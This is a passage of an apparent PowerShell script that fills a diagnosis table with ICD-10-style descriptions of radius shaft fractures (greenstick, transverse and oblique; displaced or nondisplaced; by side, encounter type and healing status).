of right radius","Unspecified fracture of shaft of right radius, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of right radius","Unspecified fracture of shaft of right radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of right radius","Unspecified fracture of shaft of right radius, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of right radius","Unspecified fracture of shaft of right radius, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of right radius","Unspecified fracture of shaft of right radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of right radius","Unspecified fracture of shaft of right radius, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of left radius","Unspecified fracture of shaft of left radius, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of left radius","Unspecified fracture of shaft of left radius, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of left radius","Unspecified fracture of shaft of left radius, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of left radius","Unspecified fracture of shaft of left radius, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of left radius","Unspecified fracture of shaft of left radius, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of left radius","Unspecified fracture of shaft of left radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of left radius","Unspecified fracture of shaft of left radius, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of left radius","Unspecified fracture of shaft of left radius, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of left radius","Unspecified fracture of shaft of left radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of left radius","Unspecified fracture of shaft of left radius, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of left radius","Unspecified fracture of shaft of left radius, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of left radius","Unspecified fracture of shaft of left radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of left radius","Unspecified fracture of shaft of left radius, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of left radius","Unspecified fracture of shaft of left radius, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of left radius","Unspecified fracture of shaft of left radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of left radius","Unspecified fracture of shaft of left radius, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of unspecified radius","Unspecified fracture of shaft of unspecified radius, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of unspecified radius","Unspecified fracture of shaft of unspecified radius, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of unspecified radius","Unspecified fracture of shaft of unspecified radius, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of unspecified radius","Unspecified fracture of shaft of unspecified radius, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of unspecified radius","Unspecified fracture of shaft of unspecified radius, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of unspecified radius","Unspecified fracture of shaft of unspecified radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of unspecified radius","Unspecified fracture of shaft of unspecified radius, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of unspecified radius","Unspecified fracture of shaft of unspecified radius, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of unspecified radius","Unspecified fracture of shaft of unspecified radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of unspecified radius","Unspecified fracture of shaft of unspecified radius, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of unspecified radius","Unspecified fracture of shaft of unspecified radius, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of unspecified radius","Unspecified fracture of shaft of unspecified radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of unspecified radius","Unspecified fracture of shaft of unspecified radius, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of unspecified radius","Unspecified fracture of shaft of unspecified radius, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of unspecified radius","Unspecified fracture of shaft of unspecified radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of unspecified radius","Unspecified fracture of shaft of unspecified radius, sequela") + $null = $DiagnosisList.Rows.Add("Greenstick fracture of shaft of radius, right arm","Greenstick fracture of shaft of radius, right arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Greenstick fracture of shaft of radius, right arm","Greenstick fracture of shaft of radius, right arm, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Greenstick fracture of shaft of radius, right arm","Greenstick fracture of shaft of radius, right arm, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Greenstick fracture of shaft of radius, right arm","Greenstick fracture of shaft of radius, right arm, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Greenstick fracture of shaft of radius, right arm","Greenstick fracture of shaft of radius, right arm, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Greenstick fracture of shaft of radius, right arm","Greenstick fracture of shaft of radius, right arm, sequela") + $null = $DiagnosisList.Rows.Add("Greenstick fracture of shaft of radius, left arm","Greenstick fracture of shaft of radius, left arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Greenstick fracture of shaft of radius, left arm","Greenstick fracture of shaft of radius, left arm, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Greenstick fracture of shaft of radius, left arm","Greenstick fracture of shaft of radius, left arm, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Greenstick fracture of shaft of radius, left arm","Greenstick fracture of shaft of radius, left arm, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Greenstick fracture of shaft of radius, left arm","Greenstick fracture of shaft of radius, left arm, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Greenstick fracture of shaft of radius, left arm","Greenstick fracture of shaft of radius, left arm, sequela") + $null = $DiagnosisList.Rows.Add("Greenstick fracture of shaft of radius, unspecified arm","Greenstick fracture of shaft of radius, unspecified arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Greenstick fracture of shaft of radius, unspecified arm","Greenstick fracture of shaft of radius, unspecified arm, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Greenstick fracture of shaft of radius, unspecified arm","Greenstick fracture of shaft of radius, unspecified arm, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Greenstick fracture of shaft of radius, unspecified arm","Greenstick fracture of shaft of radius, unspecified arm, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Greenstick fracture of shaft of radius, unspecified arm","Greenstick fracture of shaft of radius, unspecified arm, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Greenstick fracture of shaft of radius, unspecified arm","Greenstick fracture of shaft of radius, unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of right radius","Displaced transverse fracture of shaft of right radius, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of right radius","Displaced transverse fracture of shaft of right radius, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of right radius","Displaced transverse fracture of shaft of right radius, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of right radius","Displaced transverse fracture of shaft of right radius, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of right radius","Displaced transverse fracture of shaft of right radius, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of right radius","Displaced transverse fracture of shaft of right radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of right radius","Displaced transverse fracture of shaft of right radius, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of right radius","Displaced transverse fracture of shaft of right radius, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of right radius","Displaced transverse fracture of shaft of right radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of right radius","Displaced transverse fracture of shaft of right radius, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of right radius","Displaced transverse fracture of shaft of right radius, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of right radius","Displaced transverse fracture of shaft of right radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of right radius","Displaced transverse fracture of shaft of right radius, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of right radius","Displaced transverse fracture of shaft of right radius, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of right radius","Displaced transverse fracture of shaft of right radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of right radius","Displaced transverse fracture of shaft of right radius, sequela") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of left radius","Displaced transverse fracture of shaft of left radius, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of left radius","Displaced transverse fracture of shaft of left radius, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of left radius","Displaced transverse fracture of shaft of left radius, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of left radius","Displaced transverse fracture of shaft of left radius, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of left radius","Displaced transverse fracture of shaft of left radius, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of left radius","Displaced transverse fracture of shaft of left radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of left radius","Displaced transverse fracture of shaft of left radius, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of left radius","Displaced transverse fracture of shaft of left radius, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of left radius","Displaced transverse fracture of shaft of left radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of left radius","Displaced transverse fracture of shaft of left radius, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of left radius","Displaced transverse fracture of shaft of left radius, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of left radius","Displaced transverse fracture of shaft of left radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of left radius","Displaced transverse fracture of shaft of left radius, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of left radius","Displaced transverse fracture of shaft of left radius, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of left radius","Displaced transverse fracture of shaft of left radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of left radius","Displaced transverse fracture of shaft of left radius, sequela") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of unspecified radius","Displaced transverse fracture of shaft of unspecified radius, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of unspecified radius","Displaced transverse fracture of shaft of unspecified radius, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of unspecified radius","Displaced transverse fracture of shaft of unspecified radius, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of unspecified radius","Displaced transverse fracture of shaft of unspecified radius, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of unspecified radius","Displaced transverse fracture of shaft of unspecified radius, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of unspecified radius","Displaced transverse fracture of shaft of unspecified radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of unspecified radius","Displaced transverse fracture of shaft of unspecified radius, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of unspecified radius","Displaced transverse fracture of shaft of unspecified radius, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of unspecified radius","Displaced transverse fracture of shaft of unspecified radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of unspecified radius","Displaced transverse fracture of shaft of unspecified radius, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of unspecified radius","Displaced transverse fracture of shaft of unspecified radius, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of unspecified radius","Displaced transverse fracture of shaft of unspecified radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of unspecified radius","Displaced transverse fracture of shaft of unspecified radius, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of unspecified radius","Displaced transverse fracture of shaft of unspecified radius, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of unspecified radius","Displaced transverse fracture of shaft of unspecified radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of unspecified radius","Displaced transverse fracture of shaft of unspecified radius, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of right radius","Nondisplaced transverse fracture of shaft of right radius, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of right radius","Nondisplaced transverse fracture of shaft of right radius, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of right radius","Nondisplaced transverse fracture of shaft of right radius, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of right radius","Nondisplaced transverse fracture of shaft of right radius, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of right radius","Nondisplaced transverse fracture of shaft of right radius, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of right radius","Nondisplaced transverse fracture of shaft of right radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of right radius","Nondisplaced transverse fracture of shaft of right radius, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of right radius","Nondisplaced transverse fracture of shaft of right radius, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of right radius","Nondisplaced transverse fracture of shaft of right radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of right radius","Nondisplaced transverse fracture of shaft of right radius, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of right radius","Nondisplaced transverse fracture of shaft of right radius, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of right radius","Nondisplaced transverse fracture of shaft of right radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of right radius","Nondisplaced transverse fracture of shaft of right radius, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of right radius","Nondisplaced transverse fracture of shaft of right radius, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of right radius","Nondisplaced transverse fracture of shaft of right radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of right radius","Nondisplaced transverse fracture of shaft of right radius, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of left radius","Nondisplaced transverse fracture of shaft of left radius, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of left radius","Nondisplaced transverse fracture of shaft of left radius, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of left radius","Nondisplaced transverse fracture of shaft of left radius, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of left radius","Nondisplaced transverse fracture of shaft of left radius, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of left radius","Nondisplaced transverse fracture of shaft of left radius, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of left radius","Nondisplaced transverse fracture of shaft of left radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of left radius","Nondisplaced transverse fracture of shaft of left radius, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of left radius","Nondisplaced transverse fracture of shaft of left radius, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of left radius","Nondisplaced transverse fracture of shaft of left radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of left radius","Nondisplaced transverse fracture of shaft of left radius, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of left radius","Nondisplaced transverse fracture of shaft of left radius, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of left radius","Nondisplaced transverse fracture of shaft of left radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of left radius","Nondisplaced transverse fracture of shaft of left radius, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of left radius","Nondisplaced transverse fracture of shaft of left radius, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of left radius","Nondisplaced transverse fracture of shaft of left radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of left radius","Nondisplaced transverse fracture of shaft of left radius, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of unspecified radius","Nondisplaced transverse fracture of shaft of unspecified radius, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of unspecified radius","Nondisplaced transverse fracture of shaft of unspecified radius, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of unspecified radius","Nondisplaced transverse fracture of shaft of unspecified radius, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of unspecified radius","Nondisplaced transverse fracture of shaft of unspecified radius, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of unspecified radius","Nondisplaced transverse fracture of shaft of unspecified radius, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of unspecified radius","Nondisplaced transverse fracture of shaft of unspecified radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of unspecified radius","Nondisplaced transverse fracture of shaft of unspecified radius, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of unspecified radius","Nondisplaced transverse fracture of shaft of unspecified radius, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of unspecified radius","Nondisplaced transverse fracture of shaft of unspecified radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of unspecified radius","Nondisplaced transverse fracture of shaft of unspecified radius, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of unspecified radius","Nondisplaced transverse fracture of shaft of unspecified radius, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of unspecified radius","Nondisplaced transverse fracture of shaft of unspecified radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of unspecified radius","Nondisplaced transverse fracture of shaft of unspecified radius, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of unspecified radius","Nondisplaced transverse fracture of shaft of unspecified radius, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of unspecified radius","Nondisplaced transverse fracture of shaft of unspecified radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of unspecified radius","Nondisplaced transverse fracture of shaft of unspecified radius, sequela") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of right radius","Displaced oblique fracture of shaft of right radius, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of right radius","Displaced oblique fracture of shaft of right radius, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of right radius","Displaced oblique fracture of shaft of right radius, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of right radius","Displaced oblique fracture of shaft of right radius, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of right radius","Displaced oblique fracture of shaft of right radius, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of right radius","Displaced oblique fracture of shaft of right radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of right radius","Displaced oblique fracture of shaft of right radius, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of right radius","Displaced oblique fracture of shaft of right radius, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of right radius","Displaced oblique fracture of shaft of right radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of right radius","Displaced oblique fracture of shaft of right radius, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of right radius","Displaced oblique fracture of shaft of right radius, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of right radius","Displaced oblique fracture of shaft of right radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of right radius","Displaced oblique fracture of shaft of right radius, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of right radius","Displaced oblique fracture of shaft of right radius, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of right radius","Displaced oblique fracture of shaft of right radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of right radius","Displaced oblique fracture of shaft of right radius, sequela") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of left radius","Displaced oblique fracture of shaft of left radius, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of left radius","Displaced oblique fracture of shaft of left radius, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of left radius","Displaced oblique fracture of shaft of left radius, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of left radius","Displaced oblique fracture of shaft of left radius, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of left radius","Displaced oblique fracture of shaft of left radius, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of left radius","Displaced oblique fracture of shaft of left radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of left radius","Displaced oblique fracture of shaft of left radius, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of left radius","Displaced oblique fracture of shaft of left radius, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of left radius","Displaced oblique fracture of shaft of left radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of left radius","Displaced oblique fracture of shaft of left radius, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of left radius","Displaced oblique fracture of shaft of left radius, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of left radius","Displaced oblique fracture of shaft of left radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of left radius","Displaced oblique fracture of shaft of left radius, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of left radius","Displaced oblique fracture of shaft of left radius, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of left radius","Displaced oblique fracture of 